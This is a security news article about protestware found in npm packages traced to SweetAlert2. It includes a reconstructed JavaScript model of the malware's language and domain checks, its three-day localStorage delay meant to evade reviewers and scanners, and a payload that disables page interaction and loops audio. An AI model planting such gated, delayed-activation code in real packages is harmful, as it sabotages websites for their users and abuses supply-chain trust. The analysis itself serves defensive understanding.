The campaign represents a significant escalation in supply chain attacks, leveraging JavaScript package repositories to distribute politically motivated malware that disrupts user interactions on Russian and Belarusian websites.
The malware operates behind a set of conditional checks that single out visitors whose browser language is Russian and who are browsing sites whose host ends in .ru, .by, .su or .рф.
When all of those conditions are met, the protestware disables every mouse-based interaction on the page and plays the Ukrainian national anthem on loop, effectively rendering the site unusable for that audience.
Socket.dev analysts identified the widespread distribution of this protestware across multiple npm packages, tracing its origins to the popular SweetAlert2 library, which boasts over 700,000 weekly downloads.
The research team discovered that the malicious code has propagated through unintentional supply chain contamination, with developers unknowingly copying infected code from SweetAlert2 into their own packages without proper disclosure.
The campaign’s reach extends far beyond its initial vector, with affected packages ranging from UI component libraries to specialized development tools.
Many packages contain over 100,000 lines of code, with the malicious payload strategically buried deep within the codebase to avoid detection during routine code reviews.
The protestware uses a delayed-activation tactic to maximise long-term impact while avoiding immediate detection.
On the first qualifying visit it records a timestamp in the browser's localStorage, and the payload is only armed once more than three days have elapsed since that first visit.
Because nothing visible happens on the first visit, a user, a code reviewer or an automated scanner that loads a page once sees normal behaviour.
The core implementation is a chain of conditional checks: a browser-environment test (typeof window !== 'undefined', so the code is inert under Node or during server-side rendering), a language test (/^ru\b/.test(navigator.language), which matches language tags that begin with ru followed by a word boundary, such as ru or ru-RU), and a host check via location.host.match() against the targeted top-level domains.
Once all three conditions hold and the three-day timer has expired, the payload sets document.body.style.pointerEvents = 'none', which makes the page ignore mouse clicks and hovers, and appends an audio element that loads the Ukrainian national anthem from an external server and plays it on loop.
The delay works by storing a first-visit timestamp in localStorage under the key 'swal-initiation' and, on each later visit, comparing it with the current time; the payload fires only once more than three days have elapsed. Since localStorage is scoped per origin, the timer runs separately for every affected site, so a one-off visitor, a reviewer loading the page once or an automated crawl sees normal behaviour, while returning users on the targeted domains get the full effect.
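To make the gate and delay logic concrete, here is an added model of it in plain JavaScript. This is not SweetAlert2's code: the browser objects (navigator, location, localStorage, the clock) are injected so the decision can be exercised outside a browser, the ISO timestamp format is an assumption, and the TLD regex is reconstructed from the article's list of .ru, .by, .su and .рф (xn--p1ai being the punycode form of .рф).

```javascript
// Added example (not SweetAlert2's own code): a side-effect-free model of the
// gate and three-day delay described above. Browser objects are injected for
// testing; the storage format and the TLD regex are assumptions.

const DAY_MS = 24 * 60 * 60 * 1000;
const STORAGE_KEY = 'swal-initiation';            // key named in the article
// xn--p1ai is the punycode (IDNA) form of the Cyrillic .рф TLD.
const TARGET_TLD = /\.(ru|by|su|xn--p1ai)$/i;

// Minimal in-memory stand-in for window.localStorage.
function makeStorage() {
  const m = new Map();
  return {
    getItem: (k) => (m.has(k) ? m.get(k) : null),
    setItem: (k, v) => { m.set(k, String(v)); },
  };
}

// Evaluates the gate for one page load. Returns one of:
//   'skip'    - language or host does not match; nothing is stored
//   'armed'   - first matching visit; timestamp written to storage
//   'waiting' - matched again, but three days have not yet elapsed
//   'fire'    - matched and the delay has expired; payload would run
function evaluateGate({ navigator, location, storage, now }) {
  // /^ru\b/ matches 'ru' and 'ru-RU' but not a tag such as 'rub'
  if (!navigator || !/^ru\b/.test(navigator.language)) return 'skip';
  if (!TARGET_TLD.test(location.host)) return 'skip';
  const first = storage.getItem(STORAGE_KEY);
  if (first === null) {
    storage.setItem(STORAGE_KEY, now.toISOString());
    return 'armed';
  }
  const elapsedDays = (now.getTime() - Date.parse(first)) / DAY_MS;
  return elapsedDays > 3 ? 'fire' : 'waiting';
}

// What the payload does to the page, applied to an injected document object.
function applyPayload(doc, audioSrc) {
  doc.body.style.pointerEvents = 'none';        // clicks and hovers are ignored
  const audio = doc.createElement('audio');
  audio.src = audioSrc;
  audio.loop = true;
  doc.body.appendChild(audio);
  return audio;
}

// Replays visits on the given days (relative to the first visit) against one
// origin's storage and returns the gate result of each visit.
function simulateVisits(navigatorLanguage, host, visitDays) {
  const storage = makeStorage();
  const epoch = Date.UTC(2024, 0, 1);            // constructed start date
  return visitDays.map((d) => evaluateGate({
    navigator: { language: navigatorLanguage },
    location: { host },
    storage,
    now: new Date(epoch + d * DAY_MS),
  }));
}
```

`simulateVisits('ru-RU', 'example.ru', [0, 2, 4])` walks through the three states the article describes (armed, waiting, fire), while a visitor with an English locale on the same host, or a Russian-locale visitor on a .com host, is skipped on every visit and never has anything written to storage. The boundary in `/^ru\b/` matters: a tag like `rub` is not matched, and a test that drops the `\b` would widen the target set.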
The post Threat Actors Weaponized 28+ New npm Packages to Infect Users With Protestware Scripts appeared first on Cyber Security News.